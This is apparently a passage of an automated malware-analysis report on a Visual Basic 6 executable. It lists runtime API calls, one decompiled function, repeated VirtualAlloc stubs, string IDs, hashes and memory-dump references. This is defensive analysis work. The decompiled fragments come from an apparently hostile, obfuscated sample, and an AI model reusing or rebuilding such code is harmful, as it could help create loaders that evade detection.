        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040350C,00000050,?,?,?,003C314E,?,?), ref: 0040FC49
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,003C314E,?,?), ref: 0040FC70
        • __vbaObjSet.MSVBVM60(00000000,00000000,?,?,?,003C314E,?,?), ref: 0040FCA9
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000070,?,?,?,003C314E,?,?), ref: 0040FCF0
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,003C314E,?,?), ref: 0040FD17
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,003C314E,?,?), ref: 0040FD50
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000080,?,?,?,003C314E,?,?), ref: 0040FD9D
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,003C314E,?,?), ref: 0040FDC4
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,003C314E,?,?), ref: 0040FDFD
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000198,?,?,?,003C314E,?,?), ref: 0040FE47
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,003C314E,?,?), ref: 0040FE71
        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,003C314E,?,?), ref: 0040FED5
        • __vbaFreeObjList.MSVBVM60(00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,003C314E), ref: 0040FEEC
        • __vbaFreeVar.MSVBVM60 ref: 0040FEF7
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040FF0F
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FF48
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034FC,00000138), ref: 0040FF92
        • __vbaLateIdCallLd.MSVBVM60(00000008,00000000,00000000,00000000), ref: 0040FFB1
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040FFCC
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410005
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000068), ref: 0041004C
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 00410073
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004100AC
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000180), ref: 004100F9
        • __vbaStrCopy.MSVBVM60(00000000,?,004034EC,00000180), ref: 00410133
        • __vbaI4Var.MSVBVM60(00000008,?,00000669,?,00000967), ref: 00410162
        • __vbaFreeStr.MSVBVM60(?,?,00000000,?,004034EC,00000180), ref: 0041017D
        • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,00000000), ref: 00410194
        • __vbaFreeVar.MSVBVM60 ref: 0041019F
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00403330,000002B4), ref: 004101D6
        • __vbaVarAdd.MSVBVM60(00000008,00000005,?), ref: 0041020B
        • __vbaVarMove.MSVBVM60(00000008,00000005,?), ref: 00410215
        • __vbaVarTstLt.MSVBVM60(00008003,?), ref: 00410247
        • __vbaFreeVar.MSVBVM60(004102D7), ref: 004102D1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$CheckHresult$New2$Free$List$CallLateMove$Chkstk$Copy$#585#595
        • String ID: Aftgtsydelserne8$Bookdealer8$Diapositiver$I $KAUTIONERNE$SVANGREHJEMMENES$TAKTREGULERER$g$swarthmore
        • API String ID: 1062132323-3214050063
        • Opcode ID: ce50c97b6871121cbfee605bde13a433156a60fa982184a68c81987e6f2e6e31
        • Instruction ID: 1d51798494f27cf137ff690c20b3d67602530f7d3e96d159ef291e913dd1858b
        • Opcode Fuzzy Hash: ce50c97b6871121cbfee605bde13a433156a60fa982184a68c81987e6f2e6e31
        • Instruction Fuzzy Hash: 4E13F671900218EFCB21DF91CC89BD9BBB8BF08305F1044EAE509BB2A1DB795A85DF55
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413655, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73COMMON
        Download Yara Rule
        C-Code - Quality: 60%
        			E00413655(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v44;
				char _v60;
				char* _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				signed int _v124;
				signed int _t42;
				signed int _t45;
				void* _t56;
				void* _t58;
				intOrPtr _t59;

				_t59 = _t58 - 0xc;
				 *[fs:0x0] = _t59;
				L004012A0();
				_v16 = _t59;
				_v12 = 0x4011e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x4012a6, _t56);
				L004013D8();
				_v84 = L"12:12:12";
				_v92 = 8;
				L00401420();
				_push( &_v44);
				_push( &_v60); // executed
				L00401384(); // executed
				_v100 = 0xc;
				_v108 = 0x8002;
				_push( &_v60);
				_t42 =  &_v108;
				_push(_t42);
				L0040138A();
				_v112 = _t42;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L0040141A();
				_t45 = _v112;
				if(_t45 != 0) {
					_t45 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0x224a);
					asm("fclex");
					_v112 = _t45;
					if(_v112 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x15c);
						_push(0x403330);
						_push(_a4);
						_push(_v112);
						L00401402();
						_v124 = _t45;
					}
				}
				_push(0x413762);
				L004013E4();
				return _t45;
			}




















        0x00413658
        0x00413667
        0x00413671
        0x00413679
        0x0041367c
        0x00413683
        0x00413692
        0x0041369b
        0x004136a0
        0x004136a7
        0x004136b4
        0x004136bc
        0x004136c0
        0x004136c1
        0x004136c6
        0x004136cd
        0x004136d7
        0x004136d8
        0x004136db
        0x004136dc
        0x004136e1
        0x004136e8
        0x004136ec
        0x004136ed
        0x004136ef
        0x004136f7
        0x004136fd
        0x0041370c
        0x00413712
        0x00413714
        0x0041371b
        0x00413737
        0x0041371d
        0x0041371d
        0x00413722
        0x00413727
        0x0041372a
        0x0041372d
        0x00413732
        0x00413732
        0x0041371b
        0x0041373b
        0x0041375c
        0x00413761

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00413671
        • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0041369B
        • __vbaVarDup.MSVBVM60 ref: 004136B4
        • #543.MSVBVM60(?,?), ref: 004136C1
        • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 004136DC
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 004136EF
        • __vbaHresultCheckObj.MSVBVM60(00000000,004011E0,00403330,0000015C), ref: 0041372D
        • __vbaFreeStr.MSVBVM60(00413762,?,?,004012A6), ref: 0041375C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#543CheckChkstkCopyHresultList
        • String ID: 12:12:12
        • API String ID: 1254699529-1464699730
        • Opcode ID: 27ab4bc2aeb016649f72aeacb56122412326c226626be02fce935c12b7c3d485
        • Instruction ID: f00a15ddf73337d40846dfa755075798ad0257138db7381dbbc224e3a009fccf
        • Opcode Fuzzy Hash: 27ab4bc2aeb016649f72aeacb56122412326c226626be02fce935c12b7c3d485
        • Instruction Fuzzy Hash: 5331AAB1900248AFDB01EFD1C885FDDBBB8AF04745F50842AF515BB2A1D7789685CF94
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00401450, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: #100
        • String ID: VB5!6&*
        • API String ID: 1341478452-3593831657
        • Opcode ID: c63337bae1c590b4cc5a9e6df4a8bf987825fe802e7e2b87bea5b6fcb9e424f5
        • Instruction ID: 9f9231eba687bf15f97380ac2f80552ca89b6f0eb65d22b23e90d151a096a912
        • Opcode Fuzzy Hash: c63337bae1c590b4cc5a9e6df4a8bf987825fe802e7e2b87bea5b6fcb9e424f5
        • Instruction Fuzzy Hash: 9B41B7A690E7C19FC30397709C296A17FB0AF63218B1E45DBC491DF1F3D228190AC762
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405259, Relevance: 1.5, APIs: 1, Instructions: 233COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0552358a81d1d1cb8b8a41bee795d223b5f82d78eec8c1beacc240286be1b0e7
        • Instruction ID: 75b0c8a12cd6955b9cbe3827790218032bab345abdb09f1395613da5ef0f99ef
        • Opcode Fuzzy Hash: 0552358a81d1d1cb8b8a41bee795d223b5f82d78eec8c1beacc240286be1b0e7
        • Instruction Fuzzy Hash: 0551345668DE00DAF602251102106F77A28D7573206F485BBC60B3A4C3E4FD0653BF9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405275, Relevance: 1.4, APIs: 1, Instructions: 184memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: f84e27cd0fd9cb9fd7e7515cc7476de12d860181dc513afaee4301c6563e636f
        • Instruction ID: 39ce0aa33fd69380406321a6c025609005f4b4d3a0f350d5d26d47d0f79226d2
        • Opcode Fuzzy Hash: f84e27cd0fd9cb9fd7e7515cc7476de12d860181dc513afaee4301c6563e636f
        • Instruction Fuzzy Hash: DB41EEA26CDE04DAF105241967306776929E38B3257F0953BEA0B344C2A8BE07473F9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004052AE, Relevance: 1.4, APIs: 1, Instructions: 167COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 06b710d723a2088fa00f880f05cd9f82369a570f72723036115439cb3e48705e
        • Instruction ID: fba6eb25026f04e080ee858bd0b75d8d4021e7c57ff889021380261551058fff
        • Opcode Fuzzy Hash: 06b710d723a2088fa00f880f05cd9f82369a570f72723036115439cb3e48705e
        • Instruction Fuzzy Hash: 8841226229ED04D9F5062905875067B782AD38B3267B0963BDA0B380C268FF16433F6F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004054C9, Relevance: 1.4, APIs: 1, Instructions: 165COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3f71b506014aaa42b02031ed07a1353c38d37ef2645f922f81bebcfcc78cd8fc
        • Instruction ID: ee039b470bbcfe3032363f8c6fc7876eda41fa48a4dd897164679bc6ca4e7167
        • Opcode Fuzzy Hash: 3f71b506014aaa42b02031ed07a1353c38d37ef2645f922f81bebcfcc78cd8fc
        • Instruction Fuzzy Hash: 5631056279DC16E9F90A2604DA5047B2516E3AB3187F47437C20BBA0C6B9BD12037F4F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405297, Relevance: 1.4, APIs: 1, Instructions: 164memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: d9dee271b9ac74c091f52e66cd7c57a24ab21bbb634a5ef2c26f1a24cab1f37b
        • Instruction ID: bf8df127c8282ab30e6794c0bcb07b9bc4b654ab35ad8abe9637385258026d02
        • Opcode Fuzzy Hash: d9dee271b9ac74c091f52e66cd7c57a24ab21bbb634a5ef2c26f1a24cab1f37b
        • Instruction Fuzzy Hash: 2741246269ED04DAF10629065750AB77929D34B3247B0A537DA0F340C2A8FE06437F6F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040533C, Relevance: 1.4, APIs: 1, Instructions: 164memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 66f235e2bfd343f6f7f2277e51d89fd0fe4556834a9c772eafcba28a457cb0b6
        • Instruction ID: 2ae9a477c76b8d04891d0e5e35f7f2c64e5e0f2520aeb56bf92da462dcb846ab
        • Opcode Fuzzy Hash: 66f235e2bfd343f6f7f2277e51d89fd0fe4556834a9c772eafcba28a457cb0b6
        • Instruction Fuzzy Hash: D731546228ED00EAF20629168750677B929E38B3247F49537D60B390C2A4FE06437F6F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004053C3, Relevance: 1.4, APIs: 1, Instructions: 149memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: e3c06726fdc02b3f45a967d0e626413a9bd93ad32e84a3823b05787aed79ca65
        • Instruction ID: 3039562ade7c0a665dfc94d925821c81f20feae9e4fcaac14eba36b338ce1b8c
        • Opcode Fuzzy Hash: e3c06726fdc02b3f45a967d0e626413a9bd93ad32e84a3823b05787aed79ca65
        • Instruction Fuzzy Hash: D03166A228ED00D9F10628066751AB73928D34B3357F09533DA0B384C5A8BE5A837F5F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004053E6, Relevance: 1.4, APIs: 1, Instructions: 148memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 10d0532297ae752aa47145cb537f3e21dd88f06c4aea5a99ccb631258b788157
        • Instruction ID: 4e979bc9d8c1a29ab28ac3248ee5db6c64f16821b720dae1285478ea7218daf3
        • Opcode Fuzzy Hash: 10d0532297ae752aa47145cb537f3e21dd88f06c4aea5a99ccb631258b788157
        • Instruction Fuzzy Hash: 4831246229DD04EEF10525069B50ABB792DD39B3247F09533D60B350C168BE26437FAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405445, Relevance: 1.4, APIs: 1, Instructions: 146memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 3e8d160df38b0752137442876cddb21e0c9817cbf10585039df2e5aa359b5f8b
        • Instruction ID: 5d687bb8d1f85b266ddcbf11c0f5adbe3459b757c96583f53c149cc9dc24cefd
        • Opcode Fuzzy Hash: 3e8d160df38b0752137442876cddb21e0c9817cbf10585039df2e5aa359b5f8b
        • Instruction Fuzzy Hash: D93104A2BCEC00D9F602245696505B73629D39B324BB0AA37C50B350D6B8BF06073F9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040541D, Relevance: 1.4, APIs: 1, Instructions: 142memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 1f1d0df8c2746e666f5858a261319983950c48cd87e4e9d935e79c9b440c5a3d
        • Instruction ID: 06b136812083f5f36575644f85151c8d4bd11818412e05b3e2e4a61fb6d45cbd
        • Opcode Fuzzy Hash: 1f1d0df8c2746e666f5858a261319983950c48cd87e4e9d935e79c9b440c5a3d
        • Instruction Fuzzy Hash: B431F1626CEC04DAF106291597606777929D38B328BF09533DA0B3A4C6A9BE07437F5F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405485, Relevance: 1.4, APIs: 1, Instructions: 142memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: d58acd98d3d2a3ea35f4c956c466ab264c23b6c36defe7ed56fdaad4b835ecb7
        • Instruction ID: e6f11a36f3032f02de1acc23ca0132a851be915496c47067de23c6d7a2b86aa7
        • Opcode Fuzzy Hash: d58acd98d3d2a3ea35f4c956c466ab264c23b6c36defe7ed56fdaad4b835ecb7
        • Instruction Fuzzy Hash: 4A3105622CED08D9F50525154B6057BA43AE34B324BB096339A1B344D2A9BE1B437FAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405417, Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 8d248d6eac82aa30de586d9da91988223d98e763038c8dde6eaf8d88bfe7fbc4
        • Instruction ID: b685e6304711b3e915d684704d0ff61e4a478c4f66bfef97a48cd7793a1ea027
        • Opcode Fuzzy Hash: 8d248d6eac82aa30de586d9da91988223d98e763038c8dde6eaf8d88bfe7fbc4
        • Instruction Fuzzy Hash: F43120A268ED04DAF506290697606773929E38B324BF0A533D60B350C5A8BE0B437F5F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040546E, Relevance: 1.4, APIs: 1, Instructions: 132memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 09f463062e870b9b234a517f372846c2bfdf31ea0dc8207ee1adcd816214a091
        • Instruction ID: edf0fd3b31a2645e06edda2a498bb7cb4c418db01adc7ca7cc097e6e36845c2f
        • Opcode Fuzzy Hash: 09f463062e870b9b234a517f372846c2bfdf31ea0dc8207ee1adcd816214a091
        • Instruction Fuzzy Hash: FA3102A26DED04D9F506290597605377929D38B324BF0A533D60B350C568FE1A037F5F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405525, Relevance: 1.4, APIs: 1, Instructions: 127memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: ef0b387b165561e1a06f97d4abb759bfab98f6a3f5d0cbe3530991a278afb601
        • Instruction ID: 7ce8aa574c4f1112576dc16cf41dca6e843a2a5fd883e6bc6028b811fb576476
        • Opcode Fuzzy Hash: ef0b387b165561e1a06f97d4abb759bfab98f6a3f5d0cbe3530991a278afb601
        • Instruction Fuzzy Hash: A13102637CEC05C9F80625094A904BF351AD3AB3247B4A533C61B7A0C2A9BE46437F9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004054F0, Relevance: 1.4, APIs: 1, Instructions: 121memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: dc2729587b17413ade4e7118969f0ecd178e328cfc68ab14e1b5399bf9e0c7d1
        • Instruction ID: b3f813b844d0c70fbd552fce62cf460aa8865da73c2143fcf7034bbd47102346
        • Opcode Fuzzy Hash: dc2729587b17413ade4e7118969f0ecd178e328cfc68ab14e1b5399bf9e0c7d1
        • Instruction Fuzzy Hash: B521CFA26DED04DAF50625059B6093B7929D38B324BF0A537D60B350C568BE1A037F6F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004054FD, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: f0b41eff1bcccd669c99e370fc2c9fc36848b2aa4ce2df829aa1392d8261a857
        • Instruction ID: 299d06cb185f672d1c5ed0c2ae7fd34753b360f6ef991f0edefd107dae4e9ce7
        • Opcode Fuzzy Hash: f0b41eff1bcccd669c99e370fc2c9fc36848b2aa4ce2df829aa1392d8261a857
        • Instruction Fuzzy Hash: F221D0A26DED04D9F50625059B6093B7929D38B324BF09537D60B350C5A8FE1A037FAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040551D, Relevance: 1.4, APIs: 1, Instructions: 115memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: a5476f23e630fbc0c974fab14004ee3b46c9ea3f8d45152e6b807fb4d1bcab0f
        • Instruction ID: 69c2d72b5e638494807d0cf5b84aae258adf853ad2c74a5adf9b2c502065170a
        • Opcode Fuzzy Hash: a5476f23e630fbc0c974fab14004ee3b46c9ea3f8d45152e6b807fb4d1bcab0f
        • Instruction Fuzzy Hash: 3321FFA26DED04D9F5062505965083B7929D38B364BF0A533D60B350C5A8BE0A037F9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004056D9, Relevance: 1.4, APIs: 1, Instructions: 113memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
